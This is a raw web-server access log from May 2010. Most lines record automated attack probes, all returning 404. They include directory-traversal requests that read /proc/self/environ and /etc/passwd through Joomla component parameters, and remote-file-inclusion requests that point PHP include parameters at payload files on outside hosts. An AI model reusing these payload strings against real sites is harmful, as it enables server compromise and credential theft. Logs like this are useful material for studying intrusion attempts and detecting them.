85.92.87.175 - - [30/May/2010:05:14:40 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
85.92.87.175 - - [30/May/2010:05:14:41 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
85.92.87.175 - - [30/May/2010:05:14:41 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
60.234.132.61 - - [30/May/2010:05:15:12 -0500] "GET /logs/access_log.1273363200///weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.independentpowerlifting.com/images/id.jpg?? HTTP/1.1" 404 337 "-""libwww-perl/5.831"
60.234.132.61 - - [30/May/2010:05:15:13 -0500] "GET ///weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.independentpowerlifting.com/images/id.jpg?? HTTP/1.1" 404 310 "-""libwww-perl/5.831"
60.234.132.61 - - [30/May/2010:05:15:14 -0500] "GET /logs///weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.independentpowerlifting.com/images/id.jpg?? HTTP/1.1" 404 315 "-""libwww-perl/5.831"
89.107.213.98 - - [30/May/2010:05:15:16 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
69.175.84.122 - - [30/May/2010:05:18:02 -0500] "GET //bbs//skin/voy_window_blue/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:18:03 -0500] "GET //bbs//skin/voy_window_blue/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:18:03 -0500] "GET /logs/access_log.1271980800//bbs//skin/voy_window_blue/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:18:03 -0500] "GET /logs//bbs//skin/voy_window_blue/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:18:03 -0500] "GET /logs//bbs//skin/voy_window_blue/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:18:04 -0500] "GET /logs/access_log.1271980800//bbs//skin/voy_window_blue/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:18:05 -0500] "GET //bbs//skin/voy_window_blue/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:18:05 -0500] "GET /logs/access_log.1271980800//bbs//skin/voy_window_blue/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
69.175.84.122 - - [30/May/2010:05:18:05 -0500] "GET /logs//bbs//skin/voy_window_blue/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
89.35.219.220 - - [30/May/2010:05:19:36 -0500] "GET /logs/access_log.1273363200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.interkor.ro/comtim/forum/idxx.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
208.110.132.7 - - [30/May/2010:05:19:37 -0500] "GET /logs/access_log.1271980800//bbs//skin/voy_window_blue/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
208.110.132.7 - - [30/May/2010:05:19:37 -0500] "GET //bbs//skin/voy_window_blue/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.110.132.7 - - [30/May/2010:05:19:37 -0500] "GET /logs//bbs//skin/voy_window_blue/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
208.110.132.7 - - [30/May/2010:05:19:40 -0500] "GET //bbs//skin/voy_window_blue/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.110.132.7 - - [30/May/2010:05:19:40 -0500] "GET /logs//bbs//skin/voy_window_blue/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
208.110.132.7 - - [30/May/2010:05:19:40 -0500] "GET /logs/access_log.1271980800//bbs//skin/voy_window_blue/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
208.110.132.7 - - [30/May/2010:05:19:46 -0500] "GET /logs//bbs//skin/voy_window_blue/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
208.110.132.7 - - [30/May/2010:05:19:46 -0500] "GET //bbs//skin/voy_window_blue/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.110.132.7 - - [30/May/2010:05:19:46 -0500] "GET /logs/access_log.1271980800//bbs//skin/voy_window_blue/setup.php?dir=http://banderasbayportal.com/modules/mod_archive/.cok/P1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
89.35.219.220 - - [30/May/2010:05:20:07 -0500] "GET /logs/access_log.1273363200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.interkor.ro/comtim/forum/idxx.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
75.127.70.39 - - [30/May/2010:05:21:10 -0500] "GET /logs/access_log.1273363200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://temsen.org.tr/forum/Themes/idxx.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
75.127.70.39 - - [30/May/2010:05:21:32 -0500] "GET /logs/access_log.1273363200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://temsen.org.tr/forum/Themes/idxx.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
209.44.120.2 - - [30/May/2010:05:26:46 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.44.120.2 - - [30/May/2010:05:26:46 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
216.127.70.140 - - [30/May/2010:05:29:09 -0500] "GET /logs/access_log.1205107200//index.php?option=com_facileforms&task=section&id=10&Itemid=50&mosConfig_absolute_path=http://www.cts.ac.th/remote.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
216.127.70.140 - - [30/May/2010:05:29:09 -0500] "GET //index.php?option=com_facileforms&task=section&id=10&Itemid=50&mosConfig_absolute_path=http://www.cts.ac.th/remote.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
216.127.70.140 - - [30/May/2010:05:29:09 -0500] "GET /logs//index.php?option=com_facileforms&task=section&id=10&Itemid=50&mosConfig_absolute_path=http://www.cts.ac.th/remote.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
125.248.150.84 - - [30/May/2010:05:29:22 -0500] "GET //_theme/_siteColors.php?rootBase=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 307 "-""Mozilla/5.0"
125.248.150.84 - - [30/May/2010:05:29:22 -0500] "GET /logs//_theme/_siteColors.php?rootBase=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 312 "-""Mozilla/5.0"
125.248.150.84 - - [30/May/2010:05:29:26 -0500] "GET /logs/access_log.1271548800//_theme/_siteColors.php?rootBase=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 334 "-""Mozilla/5.0"
78.110.50.139 - - [30/May/2010:05:34:42 -0500] "GET /logs//index.php?_zb_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
78.110.50.139 - - [30/May/2010:05:34:42 -0500] "GET //index.php?_zb_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
78.110.50.139 - - [30/May/2010:05:34:42 -0500] "GET /logs/access_log.1271894400//index.php?_zb_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.110.50.139 - - [30/May/2010:05:34:55 -0500] "GET //index.php?_zb_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
78.110.50.139 - - [30/May/2010:05:34:55 -0500] "GET /logs/access_log.1271894400//index.php?_zb_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.110.50.139 - - [30/May/2010:05:34:56 -0500] "GET /logs//index.php?_zb_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
200.61.185.200 - - [30/May/2010:05:40:22 -0500] "GET /videodb.class.xml.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
200.61.185.200 - - [30/May/2010:05:40:26 -0500] "GET /logs/videodb.class.xml.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
200.61.185.200 - - [30/May/2010:05:40:36 -0500] "GET /logs/access_log.1271548800/videodb.class.xml.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
207.46.13.94 - - [30/May/2010:05:40:57 -0500] "GET /logs/access_log.1258329600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.10.166.186 - - [30/May/2010:05:42:18 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
72.10.166.186 - - [30/May/2010:05:42:18 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
72.10.166.186 - - [30/May/2010:05:42:18 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
72.10.166.186 - - [30/May/2010:05:42:18 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
67.195.112.180 - - [30/May/2010:05:44:18 -0500] "GET /logs/access_log.1219449600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.44.120.2 - - [30/May/2010:05:44:38 -0500] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.44.120.2 - - [30/May/2010:05:44:38 -0500] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.199.178 - - [30/May/2010:05:46:01 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.61.185.200 - - [30/May/2010:05:46:41 -0500] "GET /videodb.class.xml.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
200.61.185.200 - - [30/May/2010:05:46:55 -0500] "GET /logs/videodb.class.xml.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
200.61.185.200 - - [30/May/2010:05:46:55 -0500] "GET /logs/access_log.1238803200/videodb.class.xml.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
64.91.250.11 - - [30/May/2010:05:48:23 -0500] "GET //header.php?base_folder=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
64.91.250.11 - - [30/May/2010:05:48:23 -0500] "GET /logs/access_log.1271548800//header.php?base_folder=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
64.91.250.11 - - [30/May/2010:05:48:23 -0500] "GET /logs//header.php?base_folder=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
64.91.250.11 - - [30/May/2010:05:48:23 -0500] "GET //header.php?base_folder=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
64.91.250.11 - - [30/May/2010:05:48:23 -0500] "GET /logs//header.php?base_folder=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
64.91.250.11 - - [30/May/2010:05:48:23 -0500] "GET /logs/access_log.1271548800//header.php?base_folder=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
122.201.80.115 - - [30/May/2010:05:48:25 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
122.201.80.115 - - [30/May/2010:05:48:25 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
122.201.80.115 - - [30/May/2010:05:48:31 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
122.201.80.115 - - [30/May/2010:05:48:32 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
64.91.250.11 - - [30/May/2010:05:49:08 -0500] "GET /logs/access_log.1271894400//header.php?base_folder=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
64.91.250.11 - - [30/May/2010:05:49:11 -0500] "GET /logs/access_log.1271894400//header.php?base_folder=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
76.127.79.94 - - [30/May/2010:05:49:21 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPNTDF)"
76.127.79.94 - - [30/May/2010:05:49:57 -0500] "GET /costume/costume2.htm HTTP/1.1" 304 - "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPNTDF)"
67.195.112.180 - - [30/May/2010:05:51:22 -0500] "GET /logs/access_log.1270684800 HTTP/1.0" 200 612778 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.43 - - [30/May/2010:05:53:28 -0500] "GET /logs/access_log.1173657600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.49.28.194 - - [30/May/2010:05:53:47 -0500] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.820"
65.49.28.194 - - [30/May/2010:05:53:47 -0500] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.820"
219.117.209.213 - - [30/May/2010:05:54:17 -0500] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
219.117.209.213 - - [30/May/2010:05:54:17 -0500] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
76.12.58.212 - - [30/May/2010:05:56:17 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
76.12.58.212 - - [30/May/2010:05:56:17 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.227.143.132 - - [30/May/2010:05:56:27 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
72.32.2.216 - - [30/May/2010:05:56:27 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
67.227.143.132 - - [30/May/2010:05:56:27 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
72.32.2.216 - - [30/May/2010:05:56:27 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
203.72.226.120 - - [30/May/2010:05:56:31 -0500] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
203.72.226.120 - - [30/May/2010:05:56:31 -0500] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.7.108.203 - - [30/May/2010:05:56:35 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [30/May/2010:05:56:35 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
219.240.36.36 - - [30/May/2010:05:56:40 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
219.240.36.36 - - [30/May/2010:05:56:40 -0500] "GET /logs/access_log.1271548800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
219.240.36.36 - - [30/May/2010:05:56:40 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
72.10.166.186 - - [30/May/2010:05:56:47 -0500] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.79"
72.10.166.186 - - [30/May/2010:05:56:47 -0500] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.79"
72.10.166.186 - - [30/May/2010:05:56:47 -0500] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.79"
72.10.166.186 - - [30/May/2010:05:56:47 -0500] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.79"
91.121.104.108 - - [30/May/2010:05:56:57 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:05:56:57 -0500] "GET //index.php?option=com_kochsuite&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:05:57:02 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:05:57:02 -0500] "GET //index.php?option=com_kochsuite&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:05:57:41 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:05:57:41 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:05:57:42 -0500] "GET //index.php?option=com_jreactions&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:05:57:42 -0500] "GET //index.php?option=com_jreactions&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
89.107.213.98 - - [30/May/2010:05:58:43 -0500] "GET /logs/access_log.1273622400/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
89.107.213.98 - - [30/May/2010:05:58:43 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
89.107.213.98 - - [30/May/2010:05:58:43 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
72.32.2.216 - - [30/May/2010:05:59:11 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.32.2.216 - - [30/May/2010:05:59:12 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.107.213.98 - - [30/May/2010:05:59:14 -0500] "GET /logs/access_log.1274227200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
91.121.104.108 - - [30/May/2010:06:00:07 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:06:00:08 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:06:00:19 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:06:00:19 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
174.120.4.226 - - [30/May/2010:06:00:57 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
174.120.4.226 - - [30/May/2010:06:00:57 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
174.120.4.226 - - [30/May/2010:06:00:57 -0500] "GET /logs/access_log.1273363200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
207.7.108.203 - - [30/May/2010:06:01:10 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [30/May/2010:06:01:10 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.32.2.216 - - [30/May/2010:06:01:43 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
200.61.185.200 - - [30/May/2010:06:02:55 -0500] "GET //displayCategory.php?basepath=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
87.250.255.243 - - [30/May/2010:06:02:55 -0500] "GET /logs/access_log.1264982400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
200.61.185.200 - - [30/May/2010:06:03:01 -0500] "GET /logs/access_log.1270598400//displayCategory.php?basepath=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
200.61.185.200 - - [30/May/2010:06:03:03 -0500] "GET /logs//displayCategory.php?basepath=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.227.143.132 - - [30/May/2010:06:03:07 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.227.143.132 - - [30/May/2010:06:03:07 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
76.12.58.212 - - [30/May/2010:06:03:07 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
76.12.58.212 - - [30/May/2010:06:03:07 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
207.7.108.203 - - [30/May/2010:06:03:08 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
200.61.185.200 - - [30/May/2010:06:03:09 -0500] "GET /logs/access_log.1270857600//displayCategory.php?basepath=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
207.46.199.53 - - [30/May/2010:06:04:57 -0500] "GET /logs/access_log.1233964800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
